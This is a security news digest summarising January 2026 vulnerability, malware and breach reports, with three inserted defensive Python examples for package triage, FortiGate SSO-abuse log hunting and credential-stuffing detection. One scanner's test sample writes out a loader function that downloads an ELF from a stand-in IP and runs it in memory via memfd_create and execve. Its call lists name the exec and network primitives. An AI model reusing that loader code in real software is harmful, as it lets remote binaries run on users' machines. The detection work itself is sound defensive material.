Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12591
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2026-01-22 11:32:15 | thehackernews | VULNERABILITIES | Enhancing Google Workspace Security to Address Common Vulnerabilities | Fast-growing companies often face challenges in securing Google Workspace due to inherited tech stacks focused on growth rather than resilience.
Google Workspace offers a strong security foundation, but its native tools have limitations, particularly in handling targeted threats and sophisticated social engineering.
Multi-factor authentication (MFA) is crucial, but organizations must extend access control beyond just login credentials to prevent unauthorized access.
Material Security enhances Google Workspace by providing advanced email protection, leveraging AI and custom rules to detect and remediate complex threats.
The platform offers context-aware security, monitoring cloud office activities to detect and prevent account takeovers and suspicious behaviors.
Material also addresses gaps in data protection by automatically classifying sensitive data and enforcing file-sharing policies without hindering collaboration.
A free Google Workspace Security Scorecard is available, offering a quick assessment and actionable recommendations to improve security posture for various organizational roles. | Details |
| 2026-01-22 11:00:02 | theregister | VULNERABILITIES | Cisco Releases Critical Patch for Unified Communications Zero-Day Flaw | Cisco has issued a critical patch for a zero-day vulnerability in its Unified Communications systems, which is actively being exploited in the wild.
The flaw, identified as CVE-2026-20045, affects multiple Cisco platforms, including Unified Communications Manager and Webex Calling Dedicated Instance.
This vulnerability allows unauthenticated remote attackers to execute arbitrary code and potentially gain root access, posing a severe risk of full system compromise.
Cisco's Product Security Incident Response Team has prioritized this flaw because of its real-world impact, even though its CVSS score of 8.2 rates only as "High" rather than "Critical".
The vulnerability arises from improper validation of user input in HTTP requests, making it exploitable without authentication.
CISA has added this flaw to its Known Exploited Vulnerabilities list, urging immediate patching across federal agencies and other users.
No workarounds are available, making timely patch application crucial to prevent exploitation.
This incident follows closely on the heels of another critical patch for Cisco's Secure Email products, indicating ongoing challenges in securing their software. | Details |
| 2026-01-22 10:10:29 | thehackernews | MALWARE | Malicious PyPI Package Deploys Cryptocurrency Miner on Linux Systems | A malicious package named sympy-dev was discovered on PyPI, impersonating the legitimate SymPy library to deploy harmful payloads on Linux hosts.
The package has been downloaded over 1,100 times since its release, indicating potential widespread impact among developers.
The package is a modified copy of the real library in which specific polynomial routines have been hooked to act as a downloader for the XMRig cryptocurrency miner, so the malicious code looks like ordinary library code and only runs when those functions are called.
When triggered, the backdoored functions fetch a remote JSON configuration and an ELF payload and execute the payload in memory, leaving no file on disk for conventional scanners to find.
This attack method mirrors techniques used in past cryptojacking campaigns by groups like FritzFrog and Mimo, focusing on CPU mining while disabling GPU backends.
The campaign directs mining activities to Stratum over TLS endpoints on port 3333, using threat actor-controlled IP addresses for operations.
The Python implant serves as a versatile loader capable of executing arbitrary second-stage code, posing a broader threat beyond cryptomining.
Organizations should audit the PyPI packages they install (verify the project name and maintainer, pin versions and hashes) and monitor for Python processes that make unexpected outbound connections or spawn XMRig-style mining activity. | Details |
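As an added example (not code from the article or from the sympy-dev package), the following Python script shows two checks a practitioner can run on a package before installing it: a lookalike-name check against the projects the team actually intends to use, and a static AST scan of the source that flags any function combining a network fetch with an execution primitive, the loader pattern described above. The SAMPLE_SOURCE is constructed to imitate that pattern; the function name, URL and module layout in it are invented.

```python
"""Added example: pre-install triage of a PyPI package (not from the article or sympy-dev)."""
import ast
import difflib

# Constructed sample source imitating the loader pattern described in the article:
# an innocent-looking library function that fetches a remote config and an ELF
# payload, then runs the payload from an anonymous in-memory file.
SAMPLE_SOURCE = '''
import json, os
from urllib.request import urlopen

def poly_degree(coeffs):
    cfg = json.loads(urlopen("http://203.0.113.7/c.json").read())  # remote JSON config
    blob = urlopen(cfg["url"]).read()                              # second-stage ELF
    fd = os.memfd_create("x")                                      # anonymous in-memory file
    os.write(fd, blob)
    os.execve(f"/proc/self/fd/{fd}", ["x"], {})                    # execute from memory
    return len(coeffs) - 1
'''

# Call names that indicate network retrieval and code/binary execution.
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "create_connection", "recv"}
EXEC_CALLS = {"memfd_create", "execve", "execv", "execvp", "exec", "eval",
              "system", "popen", "Popen", "run", "CDLL"}


def _normalize(name):
    return name.lower().replace("_", "-").replace(".", "-")


def lookalike_of(candidate, known_packages, cutoff=0.8):
    """Return the known package name that `candidate` imitates, or None.

    Exact matches are legitimate. A candidate that embeds a known name as a
    dash-separated component (sympy-dev) or is within `cutoff` edit similarity
    of one (numpyy) is treated as a lookalike.
    """
    cand = _normalize(candidate)
    known = [_normalize(k) for k in known_packages]
    if cand in known:
        return None
    parts = set(cand.split("-"))
    for orig, k in zip(known_packages, known):
        if k in parts or difflib.SequenceMatcher(None, cand, k).ratio() >= cutoff:
            return orig
    return None


def _called_names(node):
    """Collect bare and attribute call names (urlopen, os.execve -> 'execve')."""
    names = set()
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            f = sub.func
            if isinstance(f, ast.Name):
                names.add(f.id)
            elif isinstance(f, ast.Attribute):
                names.add(f.attr)
    return names


def scan_source(src):
    """Flag every function (and module top-level code, which runs on import)
    that both fetches from the network and executes something."""
    tree = ast.parse(src)
    func_types = (ast.FunctionDef, ast.AsyncFunctionDef)
    units = [(n.name, n) for n in ast.walk(tree) if isinstance(n, func_types)]
    top_level = ast.Module(
        body=[s for s in tree.body if not isinstance(s, func_types + (ast.ClassDef,))],
        type_ignores=[])
    units.append(("<module>", top_level))
    findings = []
    for name, node in units:
        calls = _called_names(node)
        net, ex = calls & NETWORK_CALLS, calls & EXEC_CALLS
        if net and ex:
            findings.append({"function": name, "network": sorted(net), "exec": sorted(ex)})
    return findings


if __name__ == "__main__":
    print("lookalike:", lookalike_of("sympy-dev", ["sympy", "numpy"]))
    for f in scan_source(SAMPLE_SOURCE):
        print(f"{f['function']}: fetches via {f['network']}, executes via {f['exec']}")
```

The scan is deliberately coarse: it will also flag legitimate installers and update checkers, which is the point of a triage step; anything it flags in a library that has no business touching the network deserves a manual read of that function before the package goes anywhere near a build host.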
| 2026-01-22 09:52:14 | thehackernews | VULNERABILITIES | SmarterMail Exploitation Follows Rapid Patch Release, Exposes Critical Flaws | A critical authentication bypass vulnerability in SmarterMail was actively exploited just two days after a patch was released on January 15, 2026.
The flaw, tracked as WT-2026-0001, allows attackers to reset administrator passwords and execute operating system commands via crafted HTTP requests.
Attackers reverse-engineered the fix and exploited servers that had not yet been updated through the "/api/v1/auth/force-reset-password" endpoint.
The exploitation highlights the risk of vague release notes, as SmarterMail's documentation lacked specific details on the addressed issues.
SmarterTools plans to enhance transparency by notifying users via email about new CVEs and their resolutions, following customer feedback.
The incident follows a recent disclosure of another severe SmarterMail flaw by the Cyber Security Agency of Singapore, emphasizing ongoing security challenges.
Organizations using SmarterMail should ensure they have applied the latest patches and monitor for unusual account activities to mitigate potential threats. | Details |
| 2026-01-22 06:02:32 | thehackernews | VULNERABILITIES | Automated Attacks Exploit FortiGate SSO, Alter Firewall Configurations | Arctic Wolf identified a new wave of automated attacks targeting Fortinet FortiGate devices, exploiting SSO vulnerabilities to alter firewall configurations and create persistent access.
The attacks began on January 15, 2026, sharing characteristics with a December 2025 campaign that exploited CVE-2025-59718 and CVE-2025-59719.
These vulnerabilities enable unauthenticated bypass of SSO login authentication via crafted SAML messages when FortiCloud SSO is active.
Impacted products include FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager, with threat actors creating secondary accounts for sustained access.
Malicious SSO logins were traced to a specific account, "cloud-init@mail.io," from four IP addresses, with firewall configurations exfiltrated to these addresses.
The rapid execution of these actions suggests a high level of automation in the attack process.
Users on Reddit reported similar unauthorized logins on fully-patched devices, with Fortinet acknowledging the issue remains unresolved in version 7.4.10.
As a precaution, disabling the "admin-forticloud-sso-login" setting is recommended until a patch is available. | Details |
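Arctic Wolf's description of the activity (an SSO login by an unexpected account, immediately followed by creation of a secondary admin) maps onto a simple detection. The Python below is an added example, not Arctic Wolf's or Fortinet's code: it parses FortiOS-style key=value event logs and alerts on FortiCloud SSO admin logins by any account not on an approved list, and on a system.admin object being added by that same user and source IP within a short window. The sample log lines are constructed, and the field names and values used (logdesc, method="sso", cfgpath, action) are assumed for illustration; check them against the log format of your own devices.

```python
"""Added example: hunting for the FortiCloud SSO abuse pattern in FortiOS-style event logs."""
import re
from datetime import datetime, timedelta

# Constructed sample lines in FortiOS key=value syslog style. Field names and
# values (logdesc, method, cfgpath, action) are assumed for illustration.
SAMPLE_LOGS = """\
date=2026-01-15 time=03:12:07 logid="0100032001" type="event" subtype="system" level="information" logdesc="Admin login successful" user="netops" method="https" srcip=10.0.5.20 msg="Administrator netops logged in successfully from https(10.0.5.20)"
date=2026-01-15 time=03:14:41 logid="0100032001" type="event" subtype="system" level="information" logdesc="Admin login successful" user="cloud-init@mail.io" method="sso" srcip=198.51.100.23 msg="Administrator cloud-init@mail.io logged in successfully via FortiCloud SSO"
date=2026-01-15 time=03:14:43 logid="0100044547" type="event" subtype="system" level="information" logdesc="Object attribute configured" user="cloud-init@mail.io" srcip=198.51.100.23 cfgpath="system.admin" cfgobj="svc_backup" action="Add" msg="Add system.admin svc_backup"
date=2026-01-15 time=03:14:44 logid="0100044547" type="event" subtype="system" level="information" logdesc="Object attribute configured" user="cloud-init@mail.io" srcip=198.51.100.23 cfgpath="system.admin" cfgobj="svc_backup" cfgattr="accprofile[super_admin]" action="Edit" msg="Edit system.admin svc_backup"
date=2026-01-15 time=09:01:12 logid="0100032001" type="event" subtype="system" level="information" logdesc="Admin login successful" user="alice@example.com" method="sso" srcip=10.0.5.31 msg="Administrator alice@example.com logged in successfully via FortiCloud SSO"
"""

# key=value pairs; values are either double-quoted (may contain spaces) or bare tokens.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_line(line):
    rec = {}
    for key, val in KV_RE.findall(line):
        if len(val) >= 2 and val[0] == '"' and val[-1] == '"':
            val = val[1:-1]
        rec[key] = val
    return rec


def detect_sso_abuse(log_text, approved_sso_admins, window=timedelta(minutes=10)):
    """Return alerts as (kind, timestamp, user, detail) tuples.

    kind "unapproved_sso_login": an admin login via SSO by an account that is
    not on the approved list. kind "admin_created_by_suspect_sso": a
    system.admin object added by that same user/source IP within `window`
    of the suspect login, i.e. the persistence step described in the article.
    """
    alerts = []
    suspect = {}   # (user, srcip) -> time of unapproved SSO login
    for line in log_text.splitlines():
        rec = parse_line(line)
        if "date" not in rec or "time" not in rec:
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        key = (rec.get("user"), rec.get("srcip"))
        if (rec.get("logdesc") == "Admin login successful"
                and rec.get("method") == "sso"
                and rec.get("user") not in approved_sso_admins):
            suspect[key] = ts
            alerts.append(("unapproved_sso_login", ts, rec["user"], rec["srcip"]))
        elif rec.get("cfgpath") == "system.admin" and rec.get("action") == "Add":
            t0 = suspect.get(key)
            if t0 is not None and ts - t0 <= window:
                alerts.append(("admin_created_by_suspect_sso", ts, rec["user"], rec.get("cfgobj")))
    return alerts


if __name__ == "__main__":
    for kind, ts, user, detail in detect_sso_abuse(SAMPLE_LOGS, {"alice@example.com"}):
        print(f"{ts.isoformat()} {kind}: user={user} {detail}")
```

Because the article reports the bypass working on fully patched 7.4.10 devices, this kind of hunt is worth running retroactively over logs from the December campaign onward, not only after disabling the SSO login setting; any admin account the hunt surfaces should be removed and the device configuration reviewed for other changes made in the same session.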
| 2026-01-22 04:08:33 | thehackernews | VULNERABILITIES | Cisco Patches Critical Zero-Day Vulnerability in Unified CM and Webex | Cisco has issued patches for a critical zero-day vulnerability, CVE-2026-20045, affecting Unified Communications products and Webex Calling, which has been exploited in the wild.
The flaw, with a CVSS score of 8.2, allows unauthenticated remote attackers to execute arbitrary commands and escalate privileges to root on affected systems.
Exploitation is possible through crafted HTTP requests targeting the web-based management interface, due to improper input validation.
Impacted products include Cisco Unified CM, CM SME, CM IM&P, Webex Calling Dedicated Instance, and Cisco Unity Connection.
Cisco urges customers to upgrade to the fixed software release immediately, as no workarounds are available for this vulnerability.
The U.S. CISA has added CVE-2026-20045 to its Known Exploited Vulnerabilities catalog, mandating Federal Civilian Executive Branch agencies to apply fixes by February 11, 2026.
This discovery follows another critical vulnerability update for Cisco Secure Email products, underscoring the ongoing need for vigilance in patch management. | Details |
| 2026-01-21 23:49:36 | bleepingcomputer | MISCELLANEOUS | Global Spam Wave Exploits Unsecured Zendesk Ticket Systems | A global spam wave has exploited unsecured Zendesk support systems, impacting numerous companies and generating hundreds of confusing emails for recipients.
The spam campaign began on January 18th, targeting users worldwide with bizarre and sometimes alarming email subjects.
Attackers abused Zendesk's open ticket submission feature, which lets anyone create a ticket; by filing fake tickets with victims' addresses as the requester, they turned the companies' own ticket-notification emails into a mass-spam channel.
Affected organizations include Discord, Tinder, Riot Games, Dropbox, and several others; because the messages came through the companies' legitimate Zendesk mail flow, they bypassed traditional spam filters.
Despite the emails lacking malicious links, their volume and nature have caused concern among recipients, leading companies to reassure users.
Zendesk has implemented new safety features to detect and mitigate such spam activities, emphasizing the need for verified user restrictions.
Companies are advised to restrict ticket creation to verified users to prevent similar abuses in the future. | Details |
| 2026-01-21 23:06:24 | theregister | MISCELLANEOUS | Davos Panel Explores AI Agents as Emerging Insider Threats | At Davos, cybersecurity experts discussed the potential risks AI agents pose as insider threats, emphasizing the need for robust security measures to manage these digital entities effectively.
Pearson's CTO, Dave Treat, highlighted the dual challenge of training both humans and AI agents to prevent cyberattacks, as AI agents become more integrated into business operations.
Panelists advocated for implementing zero trust and least-privilege access models to mitigate risks associated with AI agents accessing sensitive data or systems.
Cloudflare's Michelle Zatlyn suggested treating AI agents as extensions of the workforce, necessitating similar security protocols as those for human employees.
Hatem Dowidar from e& proposed establishing guardrails and monitoring systems for AI agents, akin to recording calls for quality assurance in human interactions.
Mastercard CEO Michael Miebach recommended leveraging threat-intelligence practices from the banking sector, using comprehensive data signals to assess AI agent activities.
The discussion underscored the importance of intelligent networks and continuous monitoring to detect and isolate malicious behaviors facilitated by AI technologies. | Details |
| 2026-01-21 22:41:45 | bleepingcomputer | VULNERABILITIES | Chainlit AI Framework Vulnerabilities Threaten Cloud Security Across Industries | Two critical vulnerabilities, CVE-2026-22218 and CVE-2026-22219, were discovered in Chainlit, affecting AI systems in multiple sectors, including large enterprises and academic institutions.
The vulnerabilities, named 'ChainLeak', allow arbitrary file reading and server-side request forgery, posing significant risks to internet-facing AI deployments.
CVE-2026-22218 enables attackers to read sensitive files on the server, such as API keys and cloud credentials, without user interaction.
CVE-2026-22219 is a server-side request forgery in deployments that use the SQLAlchemy data layer: an attacker can make the server fetch an attacker-specified URL and store the response, which lets it reach internal services.
Zafran Labs researchers demonstrated that these flaws could be combined for full-system compromise and lateral movement within cloud environments.
Chainlit maintainers were notified on November 23, 2025, with a fix released on December 24, 2025, in version 2.9.4. Organizations are urged to update to the latest version.
Chainlit sees roughly 700,000 downloads per month, so the population of exposed deployments is large and updating AI frameworks promptly is urgent. | Details |
| 2026-01-21 22:17:59 | bleepingcomputer | VULNERABILITIES | Cisco Addresses Critical Zero-Day Vulnerability in Unified Communications | Cisco has resolved a critical remote code execution vulnerability in its Unified Communications and Webex Calling platforms, identified as CVE-2026-20045, which was actively exploited in the wild.
The flaw affects multiple Cisco products, including Unified Communications Manager and Webex Calling Dedicated Instance, due to improper validation of user input in HTTP requests.
Successful exploitation could grant attackers root access to affected systems, posing significant security risks to organizations relying on these communication tools.
Cisco has released specific software updates and patches to mitigate the vulnerability, advising customers to review README files before application.
No workarounds are available, making immediate patch deployment essential for securing affected systems against potential exploits.
The U.S. Cybersecurity and Infrastructure Security Agency has added this vulnerability to its Known Exploited Vulnerabilities Catalog, mandating federal agencies update by February 11, 2026.
This incident follows recent patches by Cisco for other vulnerabilities, emphasizing the ongoing need for vigilance and timely updates in cybersecurity practices. | Details |
| 2026-01-21 22:12:23 | bleepingcomputer | MALWARE | New AI-Powered Android Trojans Exploit Hidden Ads for Click Fraud | A new Android malware family uses TensorFlow machine learning to commit click fraud by interacting with hidden browser ads, instead of the injected JavaScript click routines earlier ad-fraud malware relied on.
The malware employs TensorFlow.js, enabling AI models to run in browsers, enhancing its adaptability to dynamic ad environments.
Distributed through Xiaomi's GetApps and third-party sites, the malware initially appears benign, receiving malicious updates post-installation.
The trojans operate in 'phantom' and 'signalling' modes, using virtual screens and live video feeds to automate ad interactions and mimic user behavior.
Infected apps include altered versions of popular apps like Spotify and Netflix, distributed via APK sites and Telegram channels, increasing their reach.
While the malware does not steal user data, it causes battery drain, device wear, and higher data charges, degrading the user experience.
Users are advised to avoid non-Google Play app installations and be cautious of apps offering free premium features to mitigate risks. | Details |
| 2026-01-21 21:00:20 | bleepingcomputer | DATA BREACH | PcComponentes Investigates Data Breach Claims, Confirms Credential Stuffing Attack | PcComponentes, a leading Spanish technology retailer, refuted claims of a data breach affecting 16 million customers but confirmed a credential stuffing attack on its platform.
The alleged breach involved a threat actor leaking 500,000 records and offering to sell 16.3 million records, including personal and order details, to the highest bidder.
PcComponentes' investigation found no unauthorized access to its databases, asserting the number of affected accounts is far lower than claimed.
The attack leveraged email addresses and passwords from previous breaches, with Hudson Rock identifying compromised credentials from info-stealing malware logs.
In response, PcComponentes implemented CAPTCHA on login pages, enforced two-factor authentication (2FA), and invalidated all active sessions to enhance security.
Customers are advised to use strong, unique passwords, employ password managers, and remain alert to phishing threats.
The incident underscores the ongoing risk of credential stuffing attacks and the importance of robust security measures for online platforms. | Details |
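The response PcComponentes describes (invalidating sessions, forcing 2FA) presupposes a way to tell a credential-stuffing burst apart from ordinary failed logins. As an added example, not the retailer's own code, the Python below flags a source IP that attempts many distinct accounts within a short window with a high failure rate, and collects the accounts that did log in successfully from such an IP, which are the ones whose sessions should be invalidated and passwords reset. The login events are constructed sample data in a simple space-separated format.

```python
"""Added example: credential-stuffing detection over login events (not PcComponentes' code)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events: ISO timestamp, source IP, account, outcome.
# 198.51.100.9 sprays six different accounts in four seconds and hits two that
# reuse a leaked password; 10.0.0.5 is an ordinary user who mistyped once.
SAMPLE_EVENTS = """\
2026-01-20T22:00:01 198.51.100.9 ana@example.com FAIL
2026-01-20T22:00:02 198.51.100.9 ben@example.com FAIL
2026-01-20T22:00:02 198.51.100.9 cara@example.com OK
2026-01-20T22:00:03 198.51.100.9 dan@example.com FAIL
2026-01-20T22:00:03 198.51.100.9 eva@example.com FAIL
2026-01-20T22:00:04 198.51.100.9 fin@example.com OK
2026-01-20T22:00:30 10.0.0.5 ana@example.com FAIL
2026-01-20T22:00:45 10.0.0.5 ana@example.com OK
2026-01-20T22:10:00 198.51.100.9 gus@example.com FAIL
"""


def detect_stuffing(events, window=timedelta(minutes=5), min_users=5, min_fail_rate=0.5):
    """Sliding-window detector keyed on source IP.

    An IP is flagged when, within `window`, it has tried at least `min_users`
    distinct accounts and at least `min_fail_rate` of those attempts failed
    (the failure-rate test keeps a busy NAT gateway full of legitimate logins
    from tripping the distinct-user count). Successful logins seen from a
    flagged IP are returned as accounts to reset.
    """
    recent = defaultdict(deque)   # ip -> deque of (ts, user, success) inside window
    flagged = {}                  # ip -> time it was first flagged
    to_reset = set()
    for line in events.splitlines():
        ts_s, ip, user, outcome = line.split()
        ts = datetime.fromisoformat(ts_s)
        q = recent[ip]
        q.append((ts, user, outcome == "OK"))
        while q and ts - q[0][0] > window:   # expire events outside the window
            q.popleft()
        users = {u for _, u, _ in q}
        fail_rate = sum(1 for _, _, ok in q if not ok) / len(q)
        if ip not in flagged and len(users) >= min_users and fail_rate >= min_fail_rate:
            flagged[ip] = ts
        if ip in flagged:
            to_reset.update(u for _, u, ok in q if ok)
    return {"flagged_ips": flagged, "accounts_to_reset": to_reset}


if __name__ == "__main__":
    result = detect_stuffing(SAMPLE_EVENTS)
    for ip, when in result["flagged_ips"].items():
        print(f"credential stuffing from {ip} detected at {when.isoformat()}")
    print("invalidate sessions and force reset for:", sorted(result["accounts_to_reset"]))
```

Real campaigns rotate through proxy pools, so a per-IP threshold alone misses slow, distributed runs; the same sliding-window logic applied per /24, per ASN, or per device fingerprint, together with a global failed-login rate, catches more, and a CAPTCHA or 2FA step-up triggered by the flag is cheaper than blocking outright.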
| 2026-01-21 18:14:40 | theregister | CYBERCRIME | LastPass Warns Customers of Phishing Scam Targeting Master Passwords | LastPass has alerted users to a phishing campaign falsely claiming urgent action is needed for scheduled maintenance, aiming to steal master passwords.
Emails began circulating around January 19, urging users to back up their vaults within 24 hours, a tactic to create urgency.
The phishing emails redirect victims to a malicious site, attempting to capture master passwords, potentially exposing sensitive stored credentials.
LastPass vaults hold critical personal information, making them attractive targets for financial and identity fraud.
The company is collaborating with third-party partners to dismantle malicious domains and protect users from this scam.
Previous phishing attempts included deceptive tactics, such as emails sent during holidays to delay detection and response.
LastPass has provided a list of malicious URLs, IP addresses, and email addresses to aid in threat hunting and prevention efforts. | Details |
| 2026-01-21 17:49:12 | bleepingcomputer | VULNERABILITIES | Fortinet Firewalls Face Exploitation Despite Recent Patches | Fortinet firewalls are experiencing exploitation through a bypass of a previously patched critical authentication vulnerability, CVE-2025-59718, affecting multiple FortiGate versions.
Administrators report unauthorized admin account creation via malicious SAML messages, indicating the vulnerability persists in FortiOS version 7.4.10.
Fortinet plans to release updated versions 7.4.11, 7.6.6, and 8.0.0 to address the ongoing security flaw comprehensively.
Administrators are advised to disable the vulnerable FortiCloud SSO feature temporarily to mitigate the risk of unauthorized access.
Over 25,000 Fortinet devices were initially exposed online with FortiCloud SSO enabled; this number has been reduced to approximately 11,000.
CISA has mandated federal agencies to patch the CVE-2025-59718 vulnerability within a week due to active exploitation.
A separate critical vulnerability in Fortinet FortiSIEM is also being targeted, with proof-of-concept exploit code available for attackers. | Details |
| 2026-01-21 17:20:01 | thehackernews | NATION STATE ACTIVITY | North Korean PurpleBravo Campaign Exploits Fake Job Interviews for Espionage | Recorded Future's Insikt Group identified the North Korean PurpleBravo campaign, tracing it to 3,136 victim IP addresses across 20 organizations in the AI, cryptocurrency, and financial sectors.
The campaign, active from August 2024 to September 2025, targeted companies in Europe, South Asia, the Middle East, and Central America, posing significant cyber espionage and financial theft risks.
Attackers used malicious Microsoft Visual Studio Code projects and LinkedIn personas to distribute malware, exploiting trusted developer workflows for infiltration.
PurpleBravo managed two command-and-control server sets for malware distribution, using Astrill VPN and IP ranges in China for operational security.
The campaign's tactics overlap with another North Korean operation, Wagemole, which involves IT workers seeking unauthorized employment for espionage and financial gain.
Victims executing malicious code on corporate devices increased organizational exposure, highlighting vulnerabilities in IT software supply chains to North Korean adversaries.
Organizations outsourcing work to affected regions face heightened supply-chain risks, necessitating enhanced defenses against data leakage to North Korean threat actors. | Details |